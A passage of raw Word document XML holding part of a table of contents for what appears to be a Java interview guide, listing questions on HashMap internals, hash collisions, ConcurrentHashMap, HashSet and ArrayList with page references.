        <w:p w14:paraId="277B9BC8" w14:textId="6C5239D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4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HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307645 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>246</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C1419DA" w14:textId="5A8D3A2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4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internal working of HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307646 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>249</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A30A400" w14:textId="7A577D8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4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hash collision in HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307647 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>250</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77106BBD" w14:textId="6C52B82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4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HashMap calls hashCode and equals method internally?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307648 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>251</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C022666" w14:textId="29E1183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4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are the types of HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307649 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>253</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0987F0E6" w14:textId="10B8632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5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happens in a HashMap when multiple keys have the same hashCode()??</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307650 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>254</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F3152DD" w14:textId="55F5655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5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Can HashMap store different keys that have the same hashCode?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307651 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>254</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6244C1AC" w14:textId="4D27659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5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f equals() returns true for two keys with same hashCode()?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307652 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>255</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02C6D814" w14:textId="4B33F84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5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Can we store null value in HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307653 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="215C1CA8" w14:textId="46FD669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5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Can we store infinite data in a HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307654 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65C42502" w14:textId="2C8B5FB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5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Can we access null value in HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307655 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>257</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30CCB59D" w14:textId="401D1CC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5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hashcode calculations happened on the Employee object?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307656 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>258</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3860137D" w14:textId="1A78C90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5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Can we have duplicate keys in HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307657 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>259</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58D878E0" w14:textId="58C0B88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5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does HashMap come to know that two objects are the same or different?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307658 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>260</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03A21ABF" w14:textId="7F44917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5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use of a ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307659 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>262</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CE8BE0A" w14:textId="613CDB3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6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does ConcurrentHashMap works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307660 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>263</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07CF8FBB" w14:textId="5F9FBCE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6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HashMap and ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307661 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>265</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40C9A36B" w14:textId="53D1AFE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6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HashMap and HashSet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307662 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>267</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="128F1957" w14:textId="161AF46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6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Can we add infinite elements to ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307663 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>269</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16CBCD70" w14:textId="6FF1C32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6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Can we store infinite elements in a list?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307664 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>270</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23950952" w14:textId="19823BA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6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can we add data while iterating ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307665 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>270</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27935B25" w14:textId="382E60F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6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sorted collections in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307666 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>273</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B1C5170" w14:textId="75759A6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6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ich data structure is used by HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307667 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>275</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="686D1BF6" w14:textId="22EBD53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6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HashSet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307668 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>276</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CD6AA3F" w14:textId="612426A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6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ich data structure used by HashSet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307669 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>277</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="124E12B9" w14:textId="6ECD841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7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If we have added the same key in HashMap with the same value and different key with the same hash with the same value, then how will it be stored? At what position data will store and how it will store? What will happen when we use ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
